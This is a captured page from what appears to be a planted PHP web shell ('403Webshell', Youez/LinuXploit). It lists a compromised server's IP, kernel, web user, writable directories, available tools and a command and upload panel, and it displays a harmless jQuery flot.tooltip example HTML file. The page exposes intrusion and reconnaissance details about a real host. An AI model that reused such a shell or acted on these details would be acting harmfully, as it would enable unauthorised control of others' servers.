403Webshell
Server IP : 46.62.235.243  /  Your IP : 216.73.216.163
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/linkabili/node_modules/jquery.flot.tooltip/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/linkabili/node_modules/jquery.flot.tooltip/examples//basic.html
<!doctype html>  

<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <title>flot.tooltip plugin example page</title>
    <meta name="author" content="@kenirwin">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="http://code.jquery.com/jquery-1.8.3.min.js"></script>
    <script src="js/jquery.flot.js"></script>
    <script src="../js/jquery.flot.tooltip.js"></script>

</head>

<body>
    <h1>Flot Tooltip Basic Example</h1>

<div id="chart" style="width:600px;height:150px;"></div>

<script>
  
  $(function () {
    var chartOptions = {
      series: {
        lines: { show: true },
        points: { show: true }
      },
      grid:  { hoverable: true }, //important! flot.tooltip requires this
      tooltip: {
        show: true,
        content: "%s | x: %x; y: %y"
      }
    };
    var chartData = { label: "Sample Data", data: [
        [1,6],
        [2,3],
        [3,9],
        [4,4],
        [5,2]
    ]};
    $.plot($("#chart"), [chartData], chartOptions);
  });
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit